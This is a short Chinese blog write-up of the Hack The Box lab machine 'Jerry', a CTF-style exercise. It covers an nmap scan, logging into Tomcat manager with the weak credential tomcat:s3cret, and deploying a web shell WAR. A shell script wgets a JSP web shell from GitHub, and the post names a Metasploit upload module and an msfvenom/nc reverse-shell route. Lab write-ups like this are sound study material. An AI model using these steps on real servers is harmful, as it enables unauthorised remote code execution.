HTB-Jerry
easy box.
首先nmap开路:
文章图片
找到8080端口:
文章图片
Tomcat字典:
https://raw.githubusercontent...
找到弱口令tomcat:s3cret
部署war包:
方法1:
官方walkthrough上的:
文章图片
#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war 部署wshell:
文章图片
路径比较深
文章图片
拿到flag
文章图片
方法2:
msf使用multi/http/tomcat_mgr_upload
文章图片
文章图片
文章图片
文章图片
【HTB-Jerry】方法3:
msfvenom生成war包
文章图片
上传war包后nc:
文章图片
推荐阅读
- EasyOA|EasyOA 基于SSM的实现 未完成总结与自我批判
- Word|Word Power Made Easy Review 5
- python|oeasy教您玩转python - 007 - # 字符本质
- Leetcode数组easy|Leetcode数组easy | 88. 合并两个有序数组
- 哲元科技×飞桨EasyDL|助力世界500强企业打造“灯塔工厂”,探索智能制造星辰大海
- oeasy教您玩转vim - 89 - # 高亮细节Highlight
- oeasy教您玩转vim - 88 - # 自动命令autocmd
- oeasy教您玩转vim - 87 - # 内容查找grep命令
- topcoder|Topcoder SRM 661 Div1 Easy: MissingLCM
- oeasy教您玩转vim - 85 - # 全局命令